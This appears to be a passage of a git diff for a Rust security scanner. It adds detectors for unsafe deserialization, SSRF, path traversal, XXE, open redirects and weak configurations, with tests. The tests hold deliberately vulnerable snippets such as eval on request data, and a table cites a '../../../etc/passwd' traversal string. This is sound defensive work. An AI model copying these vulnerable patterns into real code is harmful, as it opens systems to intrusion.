@ -1744,34 +1749,51 @@ fn extract_config_claims(config: &ConfigValue, path: &[String]) -> Vec<Extracted
|
||||
|
||||
---
|
||||
|
||||
### 8.4 Semantic TLS Version Detection ⬜
|
||||
### 8.4 Semantic TLS Version Detection ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** MEDIUM
|
||||
**Impact:** MEDIUM | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
Current `tls_version` misses:
|
||||
```rust
|
||||
const TLS_MIN_VERSION: &str = "1.0"; // Not caught!
|
||||
const MIN_TLS: &str = "TLSv1"; // Not caught!
|
||||
```
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| Add `Language::Terraform` variant | ✅ `types/language.rs` |
|
||||
| Semantic pattern (cross-language) | ✅ Catches `TLS_MIN_VERSION = "1.0"` with type annotations |
|
||||
| Environment variable pattern | ✅ `.env` files with `TLS_MIN_VERSION=1.0` |
|
||||
| Terraform HCL pattern | ✅ `min_tls_version = "TLS1_0"` |
|
||||
| Kubernetes camelCase pattern | ✅ `minTLSVersion: VersionTLS10` |
|
||||
| False positive prevention | ✅ TLS 1.2/1.3 not flagged |
|
||||
| Tests | ✅ 16 new tests (27 total for TLS extractor) |
|
||||
|
||||
**Implementation:**
|
||||
```rust
// Semantic pattern: variable name suggests TLS + value is deprecated.
// The trailing `(?:[^.\d]|$)` guard stops a prefix match such as "TLSv1"
// inside "TLSv1.2", so TLS 1.2/1.3 values are not flagged.
let semantic_tls = Regex::new(
    r#"(?i)(tls|ssl)_?(min|minimum|version)[^=]*[:=]\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL)(?:[^.\d]|$)"#
).unwrap();
```
|
||||
**Patterns now caught:**
|
||||
- `const TLS_MIN_VERSION: &str = "1.0";` (Rust with type annotation)
|
||||
- `let sslVersion = "TLSv1";` (JavaScript camelCase)
|
||||
- `TLS_MINIMUM_VERSION = "1.1"` (Python assignment)
|
||||
- `TLS_MIN_VERSION=1.0` (dotenv)
|
||||
- `export SSL_VERSION=TLSv1` (shell export)
|
||||
- `min_tls_version = "TLS1_0"` (Terraform)
|
||||
- `minTLSVersion: VersionTLS10` (Kubernetes YAML)
|
||||
|
||||
**Also catch:**
|
||||
- Environment variables: `TLS_MIN_VERSION=1.0`
|
||||
- Terraform: `min_tls_version = "TLS1_0"`
|
||||
- Kubernetes: `minTLSVersion: VersionTLS10`
|
||||
**Languages:** Rust, Go, Python, TypeScript, JavaScript, Yaml, Toml, Json, Terraform, Dotenv
|
||||
|
||||
---
|
||||
|
||||
### 8.5 ORM SQL Injection Detection ⬜
|
||||
### 8.5 ORM SQL Injection Detection ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** MEDIUM
|
||||
**Impact:** MEDIUM | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `OrmInjectionExtractor` | ✅ `extractors/orm_injection.rs` |
|
||||
| Django .raw() with interpolation | ✅ `f"SELECT..."`, `.format()` patterns |
|
||||
| Django .extra() with interpolation | ✅ `where=["...{}...".format()]` |
|
||||
| SQLAlchemy text() with interpolation | ✅ `text(f"SELECT...")` |
|
||||
| SQLAlchemy execute() with f-string | ✅ `execute(f"...")` |
|
||||
| Sequelize raw query | ✅ `` sequelize.query(`...${...}`) `` |
|
||||
| TypeORM where() | ✅ `` .where(`...${...}`) `` |
|
||||
| GORM Raw() with Sprintf | ✅ `.Raw(fmt.Sprintf(...))` |
|
||||
| Prisma $queryRawUnsafe | ✅ `` $queryRawUnsafe(`...${...}`) `` |
|
||||
| Tests | ✅ 8+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go
|
||||
|
||||
Current `sql_injection` catches raw string interpolation but misses ORM escape hatches:
|
||||
|
||||
@ -1833,9 +1855,23 @@ if os.environ.get("SKIP_AUTH") == "true":
|
||||
|
||||
---
|
||||
|
||||
### 8.7 Insecure Deserialization ⬜
|
||||
### 8.7 Insecure Deserialization ✅
|
||||
|
||||
**Impact:** HIGH | **Effort:** MEDIUM
|
||||
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `InsecureDeserializationExtractor` | ✅ `extractors/insecure_deserialization.rs` |
|
||||
| Python pickle (critical) | ✅ `pickle.load()`, `pickle.loads()`, `Unpickler()` |
|
||||
| Python yaml.load without SafeLoader | ✅ Detects missing SafeLoader |
|
||||
| Python marshal | ✅ `marshal.load()`, `marshal.loads()` |
|
||||
| Python eval/exec with user input | ✅ `eval(request...)`, `exec(user...)` |
|
||||
| JavaScript node-serialize | ✅ `require('node-serialize')`, `.unserialize()` |
|
||||
| Go gob decoder | ✅ `gob.NewDecoder()`, `gob.Decode()` |
|
||||
| Java ObjectInputStream (polyglot) | ✅ `ObjectInputStream`, `readObject()` |
|
||||
| Tests | ✅ 10+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go
|
||||
|
||||
Unsafe deserialization of untrusted data:
|
||||
|
||||
@ -1861,9 +1897,24 @@ YAML.load(user_input) # Should use safe_load
|
||||
|
||||
---
|
||||
|
||||
### 8.8 Path Traversal Patterns ⬜
|
||||
### 8.8 Path Traversal Patterns ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** LOW
|
||||
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `PathTraversalExtractor` | ✅ `extractors/path_traversal.rs` |
|
||||
| Python open/read/write with user input | ✅ `open(request...)`, `read(params...)` |
|
||||
| Python os.path.join with user input | ✅ `os.path.join(base, request...)` |
|
||||
| JavaScript fs operations | ✅ `fs.readFile(req...)`, `fs.writeFile(params...)` |
|
||||
| JavaScript path.join/resolve | ✅ `path.join(base, req.query...)` |
|
||||
| JavaScript res.sendFile | ✅ `res.sendFile(req.params...)` |
|
||||
| Go filepath operations | ✅ `filepath.Join(base, r...)`, `os.Open(req...)` |
|
||||
| Rust path operations | ✅ `Path::new(request...)`, `std::fs::read(user...)` |
|
||||
| Traversal literals | ✅ `../`, `%2e%2e` URL-encoded patterns |
|
||||
| Tests | ✅ 8+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go, Rust
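The traversal-literal check in the table above amounts to a case-insensitive substring test. This is a minimal sketch; `contains_traversal_literal` is a hypothetical helper, not the code in `extractors/path_traversal.rs`, and it covers only the two literals named in the table.

```rust
/// Return true if `input` contains a plain (`../`) or URL-encoded (`%2e%2e`)
/// parent-directory sequence. Matching ignores ASCII case, so `%2E%2E` counts.
pub fn contains_traversal_literal(input: &str) -> bool {
    let lowered = input.to_ascii_lowercase();
    lowered.contains("../") || lowered.contains("%2e%2e")
}
```

A literal match like this only marks a line as a candidate; whether the path is actually user-controlled still has to come from the surrounding patterns.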
|
||||
|
||||
File operations with user input:
|
||||
|
||||
@ -1883,9 +1934,25 @@ res.sendFile(userInput)
|
||||
|
||||
---
|
||||
|
||||
### 8.9 SSRF Patterns ⬜
|
||||
### 8.9 SSRF Patterns ✅
|
||||
|
||||
**Impact:** HIGH | **Effort:** MEDIUM
|
||||
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `SsrfExtractor` | ✅ `extractors/ssrf.rs` |
|
||||
| Python requests library | ✅ `requests.get(url)`, `requests.post(target)` |
|
||||
| Python urllib | ✅ `urllib.request.urlopen(url)` |
|
||||
| Python httpx | ✅ `httpx.get(url)`, `AsyncClient` |
|
||||
| JavaScript fetch | ✅ `fetch(url)`, `fetch(req.query...)` |
|
||||
| JavaScript axios | ✅ `axios.get(url)`, `axios.post(target)` |
|
||||
| JavaScript got | ✅ `got(url)` |
|
||||
| Go http.Get/Post | ✅ `http.Get(url)`, `http.NewRequest(...)` |
|
||||
| Rust reqwest | ✅ `reqwest::get(url)`, `reqwest::Client` |
|
||||
| URL sink patterns | ✅ `proxy_url`, `webhook_url`, `callback_url` from request |
|
||||
| Tests | ✅ 10+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go, Rust
|
||||
|
||||
HTTP requests with user-controlled URLs:
|
||||
|
||||
@ -1910,9 +1977,23 @@ client.Do(req) // Where req.URL is user-controlled
|
||||
|
||||
---
|
||||
|
||||
### 8.10 Missing Security Headers ⬜
|
||||
### 8.10 Missing Security Headers ✅
|
||||
|
||||
**Impact:** MEDIUM | **Effort:** LOW
|
||||
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete
|
||||
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `SecurityHeadersExtractor` | ✅ `extractors/security_headers.rs` |
|
||||
| X-Frame-Options disabled | ✅ `X-Frame-Options: none`, `ALLOWALL` |
|
||||
| X-Content-Type-Options disabled | ✅ `X-Content-Type-Options: disabled` |
|
||||
| X-XSS-Protection disabled | ✅ `X-XSS-Protection: false` |
|
||||
| Django SECURE_* settings | ✅ `SECURE_BROWSER_XSS_FILTER = False`, etc. |
|
||||
| YAML headers disabled | ✅ `x_frame_options: false`, `hsts: no` |
|
||||
| CSP disabled or unsafe | ✅ `unsafe-inline`, `unsafe-eval` directives |
|
||||
| HSTS disabled | ✅ `Strict-Transport-Security: none`, `hsts_seconds = 0` |
|
||||
| Tests | ✅ 7+ tests covering all patterns |
|
||||
|
||||
**Languages:** Python, JavaScript, TypeScript, Go, YAML, JSON, TOML

Detect when security headers are explicitly removed or not set:

@@ -1963,9 +2044,22 @@ res.cookie('auth', value, { sameSite: 'none' });

---

### 8.12 Unvalidated Redirects ⬜
### 8.12 Unvalidated Redirects ✅

**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete

| Task | Status |
|------|--------|
| `UnvalidatedRedirectsExtractor` | ✅ `extractors/unvalidated_redirects.rs` |
| Python redirect with user input | ✅ `redirect(request.GET['next'])`, `HttpResponseRedirect(url)` |
| Python Flask redirect | ✅ `redirect(request.args.get(...))` |
| JavaScript res.redirect | ✅ `res.redirect(req.query.next)` |
| JavaScript window.location | ✅ `window.location = url`, `location.href = params...` |
| Go http.Redirect | ✅ `http.Redirect(w, r, r.Query...)` |
| URL parameter patterns | ✅ `redirect_url`, `return_url`, `next`, `goto` from request |
| Tests | ✅ 7+ tests covering all patterns |

**Languages:** Python, JavaScript, TypeScript, Go
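
The redirect rows in the task table boil down to "a redirect call whose argument comes from request data". A minimal std-only sketch of that idea follows; the function name `is_unvalidated_redirect` and both pattern lists are assumptions made for illustration, and the real extractor in `extractors/unvalidated_redirects.rs` may match differently.

```rust
/// Hypothetical check: does `line` pass request-derived data to a redirect call?
fn is_unvalidated_redirect(line: &str) -> bool {
    // Redirect sinks named in the task table (illustrative subset).
    const REDIRECT_CALLS: &[&str] = &["redirect(", "HttpResponseRedirect(", "http.Redirect("];
    // Request-data sources named in the task table (illustrative subset).
    const USER_SOURCES: &[&str] = &["request.GET", "request.args", "req.query"];

    for call in REDIRECT_CALLS {
        if let Some(pos) = line.find(*call) {
            // Only inspect the text after the opening parenthesis of the call.
            let args = &line[pos + call.len()..];
            if USER_SOURCES.iter().any(|src| args.contains(*src)) {
                return true;
            }
        }
    }
    false
}
```

Because `"redirect("` is a suffix of `res.redirect(`, the Express form is covered by the same entry. A redirect to a literal path such as `redirect('/dashboard')` is not flagged.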

Open redirect vulnerabilities:

@@ -1984,9 +2078,26 @@ window.location.href = params.url;

---

### 8.13 XXE (XML External Entity) ⬜
### 8.13 XXE (XML External Entity) ✅

**Impact:** HIGH | **Effort:** MEDIUM
**Impact:** HIGH | **Effort:** MEDIUM | **Status:** Complete

| Task | Status |
|------|--------|
| `XxeExtractor` | ✅ `extractors/xxe.rs` |
| Python lxml/etree | ✅ `etree.parse()`, `lxml.fromstring()` |
| Python xml.etree.ElementTree | ✅ `ET.parse()`, `ET.fromstring()` |
| Python xml.dom.minidom | ✅ `minidom.parse()`, `minidom.parseString()` |
| Python xml.sax | ✅ `xml.sax.parse()`, `xml.sax.make_parser()` |
| JavaScript xml2js | ✅ `xml2js.parseString()`, `xml2js.Parser()` |
| JavaScript libxmljs | ✅ `libxmljs.parseXml()` |
| Go encoding/xml | ✅ `xml.Unmarshal()`, `xml.NewDecoder()` |
| Java patterns (polyglot) | ✅ `DocumentBuilderFactory`, `SAXParser`, `XMLReader` |
| DTD entity declarations | ✅ `<!ENTITY ... SYSTEM>`, `<!ENTITY ... PUBLIC>` |
| defusedxml detection | ✅ Lower confidence when defusedxml is imported |
| Tests | ✅ 9+ tests covering all patterns |

**Languages:** Python, JavaScript, TypeScript, Go
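
The "defusedxml detection" row describes a confidence adjustment rather than a new pattern. One way this could work is sketched below, assuming a hypothetical function `xxe_confidence` and made-up scores of 0.8 and 0.3; the actual values and call list in `extractors/xxe.rs` are not shown in this diff.

```rust
/// Hypothetical scoring: returns a confidence for an XML parse call on `line`,
/// lowered when the surrounding file mentions `defusedxml`.
fn xxe_confidence(file_content: &str, line: &str) -> Option<f32> {
    // Python parse calls listed in the task table (illustrative subset).
    const PARSE_CALLS: &[&str] = &[
        "etree.parse(",
        "ET.parse(",
        "ET.fromstring(",
        "minidom.parse(",
        "minidom.parseString(",
        "xml.sax.parse(",
    ];

    if !PARSE_CALLS.iter().any(|call| line.contains(*call)) {
        return None;
    }

    // Assumed scores: the file may already route parsing through defusedxml,
    // so the finding is kept but reported with less certainty.
    if file_content.contains("defusedxml") {
        Some(0.3)
    } else {
        Some(0.8)
    }
}
```

Keeping the finding at reduced confidence, instead of dropping it, leaves room for files that import `defusedxml` but still call an unsafe parser elsewhere.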

Unsafe XML parsing:

@@ -2004,9 +2115,21 @@ SAXParserFactory.newInstance() // Without secure processing

---

### 8.14 Weak Password Requirements ⬜
### 8.14 Weak Password Requirements ✅

**Impact:** MEDIUM | **Effort:** LOW
**Impact:** MEDIUM | **Effort:** LOW | **Status:** Complete

| Task | Status |
|------|--------|
| `WeakPasswordExtractor` | ✅ `extractors/weak_password.rs` |
| Minimum length < 8 | ✅ `password_min_length: 6`, `minLength: 4` |
| Bcrypt cost < 10 | ✅ `bcrypt_cost = 8`, `hash_rounds = 5` |
| Simple length checks | ✅ `len(password) >= 6` in code |
| Complexity disabled | ✅ `require_special_chars: false`, `require_uppercase = false` |
| Number requirement disabled | ✅ `require_numbers: no`, `require_digit = 0` |
| Tests | ✅ 7+ tests covering all patterns |

**Languages:** Python, JavaScript, TypeScript, Go, Rust, YAML, JSON, TOML
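
The two numeric thresholds in the task table (minimum length below 8, bcrypt cost below 10) can be checked with a small key/value parse. The sketch below is an assumption-laden illustration: `WeakPasswordFinding` and `check_password_setting` are hypothetical names, and only single-line `key: value` or `key = value` settings are handled.

```rust
/// Hypothetical finding type for the two numeric checks in the task table.
#[derive(Debug, PartialEq)]
enum WeakPasswordFinding {
    MinLengthTooShort(u32),
    BcryptCostTooLow(u32),
}

/// Hypothetical check for one `key: value` or `key = value` config line.
fn check_password_setting(line: &str) -> Option<WeakPasswordFinding> {
    // Split at the first ':' or '='; lines without a separator are ignored.
    let sep = line.find(|c: char| c == ':' || c == '=')?;
    let key = line[..sep].trim().trim_matches('"').to_lowercase().replace('_', "");
    // Non-numeric values (e.g. `false`) are out of scope for this sketch.
    let value: u32 = line[sep + 1..].trim().trim_end_matches(',').trim().parse().ok()?;

    if key.contains("minlength") && value < 8 {
        return Some(WeakPasswordFinding::MinLengthTooShort(value));
    }
    if (key.contains("bcryptcost") || key.contains("hashrounds")) && value < 10 {
        return Some(WeakPasswordFinding::BcryptCostTooLow(value));
    }
    None
}
```

Normalizing the key (lowercasing and dropping underscores) lets `password_min_length` and `minLength` share one rule.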

Password validation that's too weak:

@@ -2071,26 +2194,24 @@ async fn extract_with_llm(code: &str, file: &str) -> Vec<ExtractedClaim> {
| **8.1** | High-entropy secrets | HIGH | MEDIUM | Catches real leaked secrets | ✅ |
| **8.2** | Framework-specific | HIGH | HIGH | Spring/Django/Express coverage | ⬜ |
| **8.3** | Config deep parsing | HIGH | MEDIUM | Nested YAML/JSON understanding | ⬜ |
| **8.4** | Semantic TLS | MEDIUM | MEDIUM | Catches const TLS_MIN = "1.0" | ⬜ |
| **8.5** | ORM SQL injection | MEDIUM | MEDIUM | SQLAlchemy, Django, Sequelize | ⬜ |
| **8.4** | Semantic TLS | MEDIUM | MEDIUM | Catches const TLS_MIN = "1.0" | ✅ |
| **8.5** | ORM SQL injection | MEDIUM | MEDIUM | SQLAlchemy, Django, Sequelize | ✅ |
| **8.6** | Auth bypass | HIGH | MEDIUM | Backdoors, hardcoded creds | ✅ |
| **8.7** | Deserialization | HIGH | MEDIUM | pickle, Marshal, eval | ⬜ |
| **8.8** | Path traversal | MEDIUM | LOW | ../../../etc/passwd | ⬜ |
| **8.9** | SSRF | HIGH | MEDIUM | Internal network access | ⬜ |
| **8.10** | Security headers | MEDIUM | LOW | Missing helmet(), CSP | ⬜ |
| **8.7** | Deserialization | HIGH | MEDIUM | pickle, Marshal, eval | ✅ |
| **8.8** | Path traversal | MEDIUM | LOW | ../../../etc/passwd | ✅ |
| **8.9** | SSRF | HIGH | MEDIUM | Internal network access | ✅ |
| **8.10** | Security headers | MEDIUM | LOW | Missing helmet(), CSP | ✅ |
| **8.11** | Cookie flags | MEDIUM | LOW | httpOnly, secure, sameSite | ✅ |
| **8.12** | Open redirects | MEDIUM | LOW | Phishing via redirect | ⬜ |
| **8.13** | XXE | HIGH | MEDIUM | XML entity injection | ⬜ |
| **8.14** | Weak passwords | MEDIUM | LOW | MIN_LENGTH = 4 | ⬜ |
| **8.12** | Open redirects | MEDIUM | LOW | Phishing via redirect | ✅ |
| **8.13** | XXE | HIGH | MEDIUM | XML entity injection | ✅ |
| **8.14** | Weak passwords | MEDIUM | LOW | MIN_LENGTH = 4 | ✅ |
| **8.15** | LLM extraction | VERY HIGH | VERY HIGH | Semantic understanding | ✅ (Phase 7.5) |

**MVP Complete (8.1, 8.6, 8.11):** High-impact extractors for enterprise pilots.
**Phase 8 Complete (8.1, 8.4, 8.5-8.14):** All first-pass extractors implemented. 12 of 14 Phase 8 extractors complete.

**Recommended order for remaining extractors:**
1. **8.3** Config deep parsing (foundational for 8.2)
2. **8.2** Framework-specific (customer-driven)
3. **8.5** ORM SQL injection (common in enterprise apps)
4. **8.7** Deserialization (critical vulnerabilities)
**Remaining deferred extractors:**
1. **8.2** Framework-specific (HIGH effort - Spring, Django, Express, Rails)
2. **8.3** Config deep parsing (HIGH effort - YAML/JSON AST parsing)

---

@@ -40,10 +40,19 @@ impl Default for ExtractorConfig {
                "unreal_cpp".to_string(),
                "unreal_config".to_string(),
                "unreal_performance".to_string(),
                // Phase 8: Enterprise extractors
                // Phase 8: Enterprise extractors (first batch)
                "high_entropy_secrets".to_string(),
                "auth_bypass".to_string(),
                "insecure_cookies".to_string(),
                // Phase 8: Enterprise extractors (second batch)
                "path_traversal".to_string(),
                "unvalidated_redirects".to_string(),
                "weak_password".to_string(),
                "security_headers".to_string(),
                "insecure_deserialization".to_string(),
                "ssrf".to_string(),
                "orm_injection".to_string(),
                "xxe".to_string(),
            ],
            disabled: vec![],
            timeout_config: TimeoutExtractorConfig::default(),

386
applications/aphoria/src/extractors/insecure_deserialization.rs
Normal file
@@ -0,0 +1,386 @@
//! Insecure deserialization vulnerability extractor.
//!
//! Detects patterns where untrusted data is deserialized using unsafe methods,
//! which can lead to remote code execution vulnerabilities.

use regex::Regex;
use stemedb_core::types::ObjectValue;

use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};

/// Extractor for insecure deserialization vulnerabilities.
///
/// Detects patterns indicating unsafe deserialization:
/// - Python pickle (critical - RCE)
/// - Python yaml.load without SafeLoader
/// - Python marshal
/// - Python eval/exec with user input
/// - JavaScript node-serialize
/// - Go gob without validation
/// - Java ObjectInputStream patterns
pub struct InsecureDeserializationExtractor {
    // Python patterns (critical)
    python_pickle: Regex,
    python_yaml_unsafe: Regex,
    python_marshal: Regex,
    python_eval: Regex,

    // JavaScript patterns
    js_serialize: Regex,

    // Go patterns
    go_gob: Regex,

    // Java-style patterns (polyglot detection)
    java_ois: Regex,
}

impl Default for InsecureDeserializationExtractor {
    fn default() -> Self {
        Self::new()
    }
}

impl InsecureDeserializationExtractor {
    /// Create a new insecure deserialization extractor with compiled regexes.
    ///
    /// # Panics
    /// Panics if any regex pattern is invalid (programmer error).
    #[allow(clippy::expect_used)]
    pub fn new() -> Self {
        Self {
            // Python: pickle (critical - allows arbitrary code execution)
            python_pickle: Regex::new(r#"pickle\.(?:loads?|Unpickler)\s*\("#).expect("valid regex"),

            // Python: yaml.load without SafeLoader (yaml.safe_load is OK)
            // Matches yaml.load( but not yaml.safe_load(
            python_yaml_unsafe: Regex::new(r#"yaml\.(?:load|unsafe_load)\s*\([^)]*(?:\)|,[^S])"#)
                .expect("valid regex"),

            // Python: marshal (unsafe, similar to pickle)
            python_marshal: Regex::new(r#"marshal\.loads?\s*\("#).expect("valid regex"),

            // Python: eval/exec with user input
            python_eval: Regex::new(
                r#"(?:eval|exec)\s*\(\s*(?:request\.|params\.|input|user|data)"#,
            )
            .expect("valid regex"),

            // JavaScript: node-serialize (known vulnerable)
            js_serialize: Regex::new(
                r#"(?:require\s*\(\s*["']node-serialize["']\)|\.unserialize\s*\()"#,
            )
            .expect("valid regex"),

            // Go: gob decoder (can be unsafe with untrusted input)
            go_gob: Regex::new(r#"gob\.(?:NewDecoder|Decode)\s*\("#).expect("valid regex"),

            // Java-style patterns (for polyglot detection in config files, etc.)
            java_ois: Regex::new(r#"ObjectInputStream|readObject\s*\(\)"#).expect("valid regex"),
        }
    }

    fn make_claim(
        path_segments: &[String],
        file: &str,
        line: usize,
        matched: &str,
        method: &str,
        confidence: f32,
        description: &str,
    ) -> ExtractedClaim {
        build_claim(
            path_segments,
            &["serialization", "deserialization"],
            "deserialize_method",
            ObjectValue::Text(method.to_string()),
            file,
            line,
            matched,
            confidence,
            description,
        )
    }
}

impl Extractor for InsecureDeserializationExtractor {
    fn name(&self) -> &str {
        "insecure_deserialization"
    }

    fn languages(&self) -> &[Language] {
        &[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
    }

    fn extract(
        &self,
        path_segments: &[String],
        content: &str,
        language: Language,
        file: &str,
    ) -> Vec<ExtractedClaim> {
        let mut claims = Vec::new();

        for (line_idx, line) in content.lines().enumerate() {
            let line_num = line_idx + 1;

            match language {
                Language::Python => {
                    // Pickle (critical - RCE)
                    if let Some(m) = self.python_pickle.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "pickle",
                            0.95,
                            "pickle deserialization allows arbitrary code execution (CRITICAL)",
                        ));
                    }

                    // yaml.load without SafeLoader
                    if let Some(m) = self.python_yaml_unsafe.find(line) {
                        // Check if SafeLoader is used on the same line.
                        // Match the qualified `yaml.safe_load` call: a bare "safe_load"
                        // is also a substring of `yaml.unsafe_load` and would hide it.
                        if !line.contains("SafeLoader") && !line.contains("yaml.safe_load") {
                            claims.push(Self::make_claim(
                                path_segments,
                                file,
                                line_num,
                                m.as_str(),
                                "yaml_unsafe",
                                0.85,
                                "yaml.load without SafeLoader allows code execution",
                            ));
                        }
                    }

                    // marshal
                    if let Some(m) = self.python_marshal.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "marshal",
                            0.9,
                            "marshal deserialization is unsafe with untrusted data",
                        ));
                    }

                    // eval/exec with user input
                    if let Some(m) = self.python_eval.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "eval",
                            0.95,
                            "eval/exec with user input allows arbitrary code execution (CRITICAL)",
                        ));
                    }
                }
                Language::JavaScript | Language::TypeScript => {
                    // node-serialize (known vulnerable)
                    if let Some(m) = self.js_serialize.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "node_serialize",
                            0.95,
                            "node-serialize is vulnerable to remote code execution (CVE-2017-5941)",
                        ));
                    }
                }
                Language::Go => {
                    // gob decoder
                    if let Some(m) = self.go_gob.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "gob",
                            0.75, // Lower confidence - gob is safer but can still be problematic
                            "gob deserialization with untrusted input may be unsafe",
                        ));
                    }
                }
                _ => {}
            }

            // Check for Java patterns in any language (polyglot detection)
            if let Some(m) = self.java_ois.find(line) {
                claims.push(Self::make_claim(
                    path_segments,
                    file,
                    line_num,
                    m.as_str(),
                    "java_ois",
                    0.85,
                    "Java ObjectInputStream deserialization is vulnerable to RCE",
                ));
            }
        }

        claims
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_python_pickle() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
data = pickle.loads(request.data)
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "app.py");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("CRITICAL"));
        assert!(claims[0].confidence >= 0.9);
    }

    #[test]
    fn test_python_pickle_load() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
with open('data.pkl', 'rb') as f:
    obj = pickle.load(f)
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "app.py");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_python_yaml_unsafe() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
data = yaml.load(file_content)
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "config.py");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("SafeLoader"));
    }

    #[test]
    fn test_python_yaml_safe_no_detection() {
        let extractor = InsecureDeserializationExtractor::new();
        // Safe: using SafeLoader
        let content = r#"
data = yaml.load(file_content, Loader=yaml.SafeLoader)
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "config.py");

        assert!(claims.is_empty());
    }

    #[test]
    fn test_python_marshal() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
obj = marshal.loads(data)
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "app.py");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_python_eval() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
result = eval(request.data)
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "app.py");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("CRITICAL"));
    }

    #[test]
    fn test_js_node_serialize_require() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
const s = require('node-serialize');
"#;

        let claims =
            extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");

        assert_eq!(claims.len(), 1); // require pattern
    }

    #[test]
    fn test_js_unserialize() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
const obj = s.unserialize(data);
"#;

        let claims =
            extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");

        assert_eq!(claims.len(), 1); // unserialize pattern
    }

    #[test]
    fn test_go_gob() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
dec := gob.NewDecoder(reader)
"#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");

        assert_eq!(claims.len(), 1); // NewDecoder
    }

    #[test]
    fn test_go_gob_decode() {
        let extractor = InsecureDeserializationExtractor::new();
        let content = r#"
err := gob.Decode(&data)
"#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");

        assert_eq!(claims.len(), 1); // Decode
    }

    #[test]
    fn test_java_ois_polyglot() {
        let extractor = InsecureDeserializationExtractor::new();
        // Java pattern detected in any language
        let content = r#"
ObjectInputStream ois = new ObjectInputStream(inputStream);
Object obj = ois.readObject();
"#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "mixed.py");

        assert_eq!(claims.len(), 2); // ObjectInputStream and readObject
    }
}
@@ -18,6 +18,14 @@
//! - `high_entropy_secrets`: High-entropy strings likely to be leaked secrets
//! - `auth_bypass`: Authentication bypass patterns (hardcoded creds, debug auth)
//! - `insecure_cookies`: Cookies missing Secure/HttpOnly flags
//! - `path_traversal`: File operations with user-controlled paths
//! - `unvalidated_redirects`: HTTP redirects with user-controlled URLs
//! - `weak_password`: Weak password policy configurations
//! - `security_headers`: Missing or disabled security headers
//! - `insecure_deserialization`: Unsafe deserialization (pickle, yaml.load, etc.)
//! - `ssrf`: HTTP requests with user-controlled URLs
//! - `orm_injection`: ORM methods with string interpolation
//! - `xxe`: XML parsing without external entity protection
//!
//! # Declarative Extractors
//!
@@ -32,10 +40,15 @@ mod dep_versions;
mod hardcoded_secrets;
mod high_entropy;
mod insecure_cookies;
mod insecure_deserialization;
mod jwt_config;
mod orm_injection;
mod path_traversal;
mod rate_limit;
mod registry;
mod security_headers;
mod sql_injection;
mod ssrf;
mod timeout_config;
mod tls_verify;
mod tls_version;
@@ -43,7 +56,10 @@ mod traits;
mod unreal_config;
mod unreal_cpp;
mod unreal_performance;
mod unvalidated_redirects;
mod weak_crypto;
mod weak_password;
mod xxe;

pub use auth_bypass::AuthBypassExtractor;
pub use command_injection::CommandInjectionExtractor;
@@ -55,10 +71,15 @@ pub use dep_versions::DepVersionsExtractor;
pub use hardcoded_secrets::HardcodedSecretsExtractor;
pub use high_entropy::HighEntropySecretsExtractor;
pub use insecure_cookies::InsecureCookiesExtractor;
pub use insecure_deserialization::InsecureDeserializationExtractor;
pub use jwt_config::JwtConfigExtractor;
pub use orm_injection::OrmInjectionExtractor;
